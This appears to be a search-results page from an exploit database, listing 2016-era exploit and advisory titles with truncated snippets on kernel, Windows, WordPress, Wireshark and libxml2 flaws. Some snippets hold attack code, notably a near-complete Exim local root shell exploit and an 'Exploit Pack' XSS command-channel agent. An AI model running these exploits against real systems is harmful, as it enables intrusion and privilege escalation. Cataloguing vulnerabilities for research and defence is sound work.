41207 matches found
Linux Kernel 3.10.0 (CentOS RHEL 7.1) - Wacom Multiple Nullpointer Dereferences
Linux Kernel 3.10.0 CentOS RHEL 7.1 - Wacom Multiple Nullpointer Dereferences OS-S Security Advisory 2016-11 Linux wacom multiple Nullpointer Dereferences Date: March 4th, 2016 Authors: Sergej Schumilo, Hendrik Schwartke, Ralf Spenneberg CVE: not yet assigned CVSS: 4.9 AV:L/AC:L/Au:N/C:N/I:N/A:C...
Adobe Digital Editions 4.5.0 - .pdf Critical Memory Corruption
Adobe Digital Editions 4.5.0 - .pdf Critical Memory Corruption Title: Adobe Digital Editions = 4.5.0 - Critical memory corruption Application: Adobe Digital Editions Version: 4.5.0 and earlier versions Platform: Windows, Macintosh, iOS and Android Software Link:...
Linux Kernel 3.10.0 (CentOS RHEL 7.1) - cdc_acm Nullpointer Dereference
Linux Kernel 3.10.0 CentOS RHEL 7.1 - cdc_acm Nullpointer Dereference OS-S Security Advisory 2016-06 Linux cdc_acm Nullpointer Dereference Date: March 4th, 2016 Authors: Sergej Schumilo, Hendrik Schwartke, Ralf Spenneberg CVE: not yet assigned CVSS: 4.9 AV:L/AC:L/Au:N/C:N/I:N/A:C Title: Local RedHa...
Linux Kernel 3.10.0 (CentOS RHEL 7.1) - digi_acceleport Nullpointer Dereference
Linux Kernel 3.10.0 CentOS RHEL 7.1 - digi_acceleport Nullpointer Dereference OS-S Security Advisory 2016-12 Linux digi_acceleport Nullpointer Dereference Date: March 4th, 2016 Authors: Sergej Schumilo, Hendrik Schwartke, Ralf Spenneberg CVE: not yet assigned CVSS: 4.9 AV:L/AC:L/Au:N/C:N/I:N/A:C...
Linux Kernel 3.10.0 (CentOS RHEL 7.1) - cypress_m8 Nullpointer Dereference
Linux Kernel 3.10.0 CentOS RHEL 7.1 - cypress_m8 Nullpointer Dereference OS-S Security Advisory 2016-07 Linux cypress_m8 Nullpointer Dereference Date: March 4th, 2016 Authors: Sergej Schumilo, Hendrik Schwartke, Ralf Spenneberg CVE: not yet assigned CVSS: 4.9 AV:L/AC:L/Au:N/C:N/I:N/A:C Title: Local...
Exim 4.84-3 - Local Privilege Escalation
Exim 4.84-3 - Local Privilege Escalation !/bin/sh CVE-2016-1531 exim /tmp/root.pm EOF package root; use strict; use warnings; system"/bin/sh"; EOF PERL5LIB=/tmp PERL5OPT=-Mroot /usr/exim/bin/exim -ps...
Linux Kernel 3.103.18 4.4 - Netfilter IPT_SO_SET_REPLACE Memory Corruption
Linux Kernel 3.103.18 4.4 - Netfilter IPT_SO_SET_REPLACE Memory Corruption Source: https://code.google.com/p/google-security-research/issues/detail?id=758 A memory corruption vulnerability exists in the IPT_SO_SET_REPLACE ioctl in the netfilter code for iptables support. This ioctl can be triggered ...
WordPress Theme SiteMile Project 2.0.9.5 - Multiple Vulnerabilities
WordPress Theme SiteMile Project 2.0.9.5 - Multiple Vulnerabilities -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 === LSE Leading Security Experts GmbH - Security Advisory 2016-01-01 === Wordpress ProjectTheme Multiple Vulnerabilities - -...
Linux Kernel 3.10.0 (CentOS RHEL 7.1) - visor clie_5_attach Nullpointer Dereference
Linux Kernel 3.10.0 CentOS RHEL 7.1 - visor clie_5_attach Nullpointer Dereference OS-S Security Advisory 2016-09 Linux visor clie_5_attach Nullpointer Dereference Date: March 4th, 2016 Authors: Sergej Schumilo, Hendrik Schwartke, Ralf Spenneberg CVE: CVE-2015-7566 CVSS: 4.9 AV:L/AC:L/Au:N/C:N/I:N/A:C...
Linux Kernel 3.10.0 (CentOS RHEL 7.1) - visor treo_attach Nullpointer Dereference
Linux Kernel 3.10.0 CentOS RHEL 7.1 - visor treo_attach Nullpointer Dereference OS-S Security Advisory 2016-10 Linux visor treo_attach Nullpointer Dereference Date: March 4th, 2016 Authors: Sergej Schumilo, Hendrik Schwartke, Ralf Spenneberg CVE: CVE-2016-2782 CVSS: 4.9 AV:L/AC:L/Au:N/C:N/I:N/A:C...
Cerberus Helpdesk (Cerb5) 5 6.7 - Password Hash Disclosure
Cerberus Helpdesk Cerb5 5 6.7 - Password Hash Disclosure !/bin/bash Exploit Title: Cerberus Helpdesk Cerb5 Password Hash Grabbing Date: 04.02.2016 Exploit Author: asdizzle Vendor Homepage: http://www.cerberusweb.com/ Software Link: http://www.cerberusweb.com/downloads/cerb5/archive/cerb5-544.zip...
Microsoft Windows 7 (x64) - afd.sys Dangling Pointer Privilege Escalation (MS14-040)
Microsoft Windows 7 x64 - afd.sys Dangling Pointer Privilege Escalation MS14-040 Exploit Title: MS14-040 - AFD.SYS Dangling Pointer Date: 2016-03-03 Exploit Author: Rick Larabee Vendor Homepage: www.microsoft.com Version: Windows 7, 64 bit Tested on: Win7 x64 afd.sys - 6.1.7601.17514 ntdll.dll -...
McAfee VirusScan Enterprise 8.8 - Security Restrictions Bypass
McAfee VirusScan Enterprise 8.8 - Security Restrictions Bypass / Security Advisory @ Mediaservice.net Srl 01, 13/04/2016 Data Security Division Title: McAfee VirusScan Enterprise security restrictions bypass Application: McAfee VirusScan Enterprise 8.8 and prior versions Platform: Microsoft Windo...
Avast! - Authenticode Parsing Memory Corruption
Avast! - Authenticode Parsing Memory Corruption Source: https://code.google.com/p/google-security-research/issues/detail?id=668 The attached PE file causes memory corruption in Avast, it looks related to authenticode parsing. 474.c0c: Access violation - code c0000005 first chance First chance...
Wireshark - wtap_optionblock_free Use-After-Free
Wireshark - wtap_optionblock_free Use-After-Free Source: https://code.google.com/p/google-security-research/issues/detail?id=739 The following crash due to a use-after-free condition can be observed in an ASAN build of Wireshark current git master, by feeding a malformed file to tshark "$ ./tshark...
ATutor LMS - install_modules.php Cross-Site Request Forgery Remote Code Execution
ATutor LMS - install_modules.php Cross-Site Request Forgery Remote Code Execution / exp.js ATutor LMS " in it - You will need to set the Access-Control-Allow-Origin header to allow the target to pull zips - Use this with your favorite XSS attack - Student proof, aka bullet proof Timeline: 23/02/20...
PHPLib 7.4 - SQL Injection
PHPLib 7.4 - SQL Injection PHPLib SQL Injection Vendor: PHPLib Product: PHPLib Version: newid=true; $this-name = $this-cookiename==""?$this-classname:$this-cookiename; if "" == $id $this-newid=false; switch $this-mode case "get": $id = isset$HTTPGETVARS$this-name ?...
WordPress Plugin Bulk Delete 5.5.3 - Privilege Escalation
WordPress Plugin Bulk Delete 5.5.3 - Privilege Escalation ''' Exploit Title: WordPress Bulk Delete Plugin Privilege Escalation Discovery Date: 2016-02-10 Exploit Author: Panagiotis Vagenas Author Link: https://twitter.com/panVagenas Vendor Homepage: http://bulkwp.com/ Software Link:...
DropBearSSHD 2015.71 - Command Injection
DropBearSSHD 2015.71 - Command Injection VuNote ============ Author: Ref: https://github.com/tintinweb/pub/tree/master/pocs/cve-2016-3116 Version: 0.2 Date: Mar 3rd, 2016 Tag: dropbearsshd xauth command injection may lead to forced-command bypass Overview -------- Name: dropbear Vendor: Matt...
Schneider Electric SBO AS - Multiple Vulnerabilities
Schneider Electric SBO AS - Multiple Vulnerabilities Exploit Title: Schneider Electric SBO / AS Multiple Vulnerabilities Discovered by: Karn Ganeshen Vendor Homepage: www.schneider-electric.com Versions Reported: Automation Server Series AS, AS-P, v1.7 and prior CVE-ID: CVE-2016-2278 About...
Secret Net 7 and Secret Net Studio 8 - Local Privilege Escalation
Secret Net 7 and Secret Net Studio 8 - Local Privilege Escalation Source: https://github.com/Cr4sh/secretnetexpl Secret Net 7 and Secret Net Studio 8 local privileges escalation exploit. 0day vulnerabilities in sncc0.sys kernel driver of Security Code products allows attacker to perform local...
Quick Tftp Server Pro 2.3 - Read Mode Denial of Service
Quick Tftp Server Pro 2.3 - Read Mode Denial of Service Exploit Title: Quick Tftp Server Pro 2.3 TFTP mode Remote Overflow DoS Date: 21/01/2016 Exploit Author: Guillaume Kaddouch Twitter: @gkweb76 Blog: https://networkfilter.blogspot.com GitHub: https://github.com/gkweb76/exploits Vendor Homepage...
PictureTrails Photo Editor GE.exe 2.0.0 - .bmp Crash (PoC)
PictureTrails Photo Editor GE.exe 2.0.0 - .bmp Crash PoC Exploit Title: PictureTrail Photo Editor GE.exe 2.00 - ./bmp Crash PoC Date: 01-03-2016 Exploit Author: redknight99 Vendor Homepage: http://www.picturetrail.com/ Software Link: http://www.picturetrail.com/downloads/photoeditor200.exe Versio...
Gallery 2 2.0.2 - Multiple Vulnerabilities
Gallery 2 2.0.2 - Multiple Vulnerabilities Gallery 2 Multiple Vulnerabilities Vendor: Bharat Mediratta Product: Gallery 2 Version: = 2.0.2 Website: http://gallery.menalto.com/ BID: 16940 CVE: CVE-2006-1127 CVE-2006-1128 OSVDB: 23596 23597 SECUNIA: 19104 PACKETSTORM: 44358 Description: Gallery2, t...
FreeProxy Internet Suite 4.10 - Denial of Service
FreeProxy Internet Suite 4.10 - Denial of Service Exploit Title: Freeproxy Internet Suite 4.10 Remote DoS Date: 01/03/2016 Exploit Author: Guillaume Kaddouch Twitter: @gkweb76 Blog: https://networkfilter.blogspot.com GitHub: https://github.com/gkweb76/exploits Vendor Homepage:...
WordPress Plugin CP Polls 1.0.8 - Multiple Vulnerabilities
WordPress Plugin CP Polls 1.0.8 - Multiple Vulnerabilities Exploit Title: WordPress CP Polls 1.0.8 - CSRF - Update poll settings & Persistent XSS Date: 2016-02-22 Google Dork: Index of /wp-content/plugins/cp-polls/ Exploit Author: Joaquin Ramirez Martinez i0akiN SEC-LABORATORY Plugin URI:...
Crouzet em4 soft 1.1.04 M3 soft 3.1.2.0 - Insecure File Permissions
Crouzet em4 soft 1.1.04 M3 soft 3.1.2.0 - Insecure File Permissions Crouzet em4 soft 1.1.04 and M3 soft 3.1.2.0 Insecure File Permissions Vendor: Crouzet Automatismes SAS Product web page: http://www.crouzet-automation.com Affected version: em4 soft 1.1.04 and 1.1.03.01 M3 soft 3.1.2.0 Summary:...
Crouzet em4 soft 1.1.04 - .pm4 Integer Division By Zero
Crouzet em4 soft 1.1.04 - .pm4 Integer Division By Zero Crouzet em4 soft 1.1.04 Integer Division By Zero Vendor: Crouzet Automatismes SAS Product web page: http://www.crouzet-automation.com Affected version: 1.1.04 and 1.1.03.01 Summary: em4 is more than just a nano-PLC. It is a leading edge...
Viscomsoft Calendar Active-X 2.0 - Multiple Crashes (PoC)
Viscomsoft Calendar Active-X 2.0 - Multiple Crashes PoC Exploit Title: Viscomsoft Calendar Active-X 2.0 - Multiple Crash PoCs Date: 01-03-2016 Exploit Author: Shantanu Khandelwal Twitter: @shantanu561993 Vendor Homepage: http://www.viscomsoft.com/ Software Link:...
WordPress Plugin More Fields 2.1 - Cross-Site Request Forgery
WordPress Plugin More Fields 2.1 - Cross-Site Request Forgery Exploit Title: Wordpress More Fields Plugin 2.1 Cross-Site Request Forgery Date: 28-02-2016 Software Link: https://wordpress.org/support/plugin/more-fields Exploit Author: Aatif Shahdad Twitter: https://twitter.com/61617469665f736...
Comodo Anti-Virus - SHFolder.dll Local Privilege Escalation
WordPress Plugin Ocim MP3 - SQL Injection
WordPress Plugin Ocim MP3 - SQL Injection ======== Ocim MP3 Plugin SQL Injection Vulnerability ======== :----------------------------------------------------------------------------------------------------: : Exploit Title : Ocim MP3 Plugin SQL Injection Vulnerability : Date : 26 February 2016 :...
phpRPC 0.7 - Remote Code Execution
phpRPC 0.7 - Remote Code Execution phpRPC Remote Code Execution Vendor: Robert Hoffman Product: phpRPC Version: = 0.7 Website: http://sourceforge.net/projects/phprpc/ BID: 16833 CVE: CVE-2006-1032 OSVDB: 23514 SECUNIA: 19028 PACKETSTORM: 44267 Description: phpRPC is meant to be an easy to use...
Wireshark - print_hex_data_buffer print_packet Use-After-Free
Wireshark - print_hex_data_buffer print_packet Use-After-Free Source: https://code.google.com/p/google-security-research/issues/detail?id=651 The following crash due to a use-after-free condition can be observed in an ASAN build of Wireshark current git master, by feeding a malformed file to tshark "...
Zimbra 8.0.9 GA - Cross-Site Request Forgery
Zimbra 8.0.9 GA - Cross-Site Request Forgery ====================================== Multiple CSRF in Zimbra Mail interface ====================================== CVE-2015-6541 Description =========== Multiple CSRF vulnerabilities have been found in the Mail interface of Zimbra 8.0.9 GA Release,...
Infor CRM 8.2.0.1136 - Multiple HTML Script Injection Vulnerabilities
Infor CRM 8.2.0.1136 - Multiple HTML Script Injection Vulnerabilities Infor CRM 8.2.0.1136 Multiple HTML Script Injection Vulnerabilities Vendor: Infor Product web page: http://www.infor.com Affected version: 8.2.0.1136 Summary: Infor® CRM, formerly Saleslogix, is an award-winning customer...
Agent-XSS
An XSS Channel is an interactive communication channel between two systems which is opened by an XSS attack. At a technical level, it is a type of AJAX application which can obtain commands, send responses back and is able to talk cross-domain. // Exploit Pack server - Change 127.0.0.1 to your IP...
Qualcomm Adreno GPU MSM Driver - perfcounter Query Heap Overflow
Qualcomm Adreno GPU MSM Driver - perfcounter Query Heap Overflow / Source: https://code.google.com/p/google-security-research/issues/detail?id=734 The Adreno GPU driver for the MSM Linux kernel contains a heap overflow in the IOCTL_KGSL_PERFCOUNTER_QUERY ioctl command. The bug results from an...
Agent-VBS
An XSS Channel is an interactive communication channel between two systems which is opened by an XSS attack. At a technical level, it is a type of AJAX application which can obtain commands, send responses back and is able to talk cross-domain. 'Exploit Pack VBS Agent code + Web IE Object - Juan...
Linux Kernel - io_submit L2TP sendmsg Integer Overflow
Linux Kernel - io_submit L2TP sendmsg Integer Overflow / Source: https://code.google.com/p/google-security-research/issues/detail?id=735 In certain kernel versions it is possible to use the AIO subsystem io_submit syscall to pass size values larger than MAX_RW_COUNT to the networking subsystem's...
Microsoft Windows - NetAPI32.dll Code Execution (Python) (MS08-067)
Microsoft Windows - NetAPI32.dll Code Execution Python MS08-067 import struct import time import sys from threading import Thread Thread is imported incase you would like to modify try: from impacket import smb from impacket import uuid from impacket import dcerpc from impacket.dcerpc.v5 import...
Microsoft Windows - srv2.sys SMB Code Execution (Python) (MS09-050)
Microsoft Windows - srv2.sys SMB Code Execution Python MS09-050 EDB-Note: Source https://raw.githubusercontent.com/ohnozzy/Exploit/master/MS09050.py !/usr/bin/python This module depends on the linux command line program smbclient. I can't find a python smb library for smb login. If you can find...
Centreon 2.5.3 - Remote Command Execution
Centreon 2.5.3 - Remote Command Execution Unauthenticated Remote Command Execution in Centreon Web Interface ================================================================== Description =========== Centreon is a popular monitoring solution. A critical vulnerability has been found in the Centreo...
GpicView 0.2.5 - Crash (PoC)
GpicView 0.2.5 - Crash PoC !/usr/bin/python Exploit Title: GpicView Buffer Overflow DOS Date: 25th February 2016 Exploit Author: David Silveiro Xino.co.uk Vendor Homepage: lxde.sourceforge.net/gpicview/ Software Link:...
Proxmox VE 34 - Insecure Hostname Checking Remote Command Execution
Proxmox VE 34 - Insecure Hostname Checking Remote Command Execution ===================================================================== Proxmox VE 3/4 Insecure Hostname Checking Remote Root Exploit, XSS, Privileges escalation =====================================================================...
Joomla! Component com_poweradmin 2.3.0 - Multiple Vulnerabilities
Joomla! Component com_poweradmin 2.3.0 - Multiple Vulnerabilities --------------------------------------------------------- RatioSec Research Security Advisory RS-2016-001 --------------------------------------------------------- JSN PowerAdmin Joomla! Extension Remote Command Execution Via CSRF a...
IBM Lotus Domino R8 - Password Hash Extraction
IBM Lotus Domino R8 - Password Hash Extraction Exploit Title: IBM Lotus Domino = R8 Password Hash Extraction Exploit Google Dork: inurl:names.nsf?opendatabase Date: 02-24-2016 Exploit Author: Jonathan Broche Contact: https://twitter.com/g0jhonny Vendor Homepage:...
libxml2 - xmlParserPrintFileContextInternal Heap Buffer Overread
libxml2 - xmlParserPrintFileContextInternal Heap Buffer Overread Source: https://code.google.com/p/google-security-research/issues/detail?id=639 The following crash due to a heap-based out-of-bounds memory read can be observed in an ASAN build of latest stable libxml2 2.9.3, released 4 days ago, ...
libxml2 - xmlParseEndTag2 Heap Buffer Overread
libxml2 - xmlParseEndTag2 Heap Buffer Overread Source: https://code.google.com/p/google-security-research/issues/detail?id=638 The following crash due to a heap-based out-of-bounds memory read can be observed in an ASAN build of latest stable libxml2 2.9.3, released 4 days ago, by feeding a...
libxml2 - xmlDictAddString Heap Buffer Overread
libxml2 - xmlDictAddString Heap Buffer Overread Source: https://code.google.com/p/google-security-research/issues/detail?id=637 The following crash due to a heap-based out-of-bounds memory read can be observed in an ASAN build of latest stable libxml2 2.9.3, released 4 days ago, by feeding a...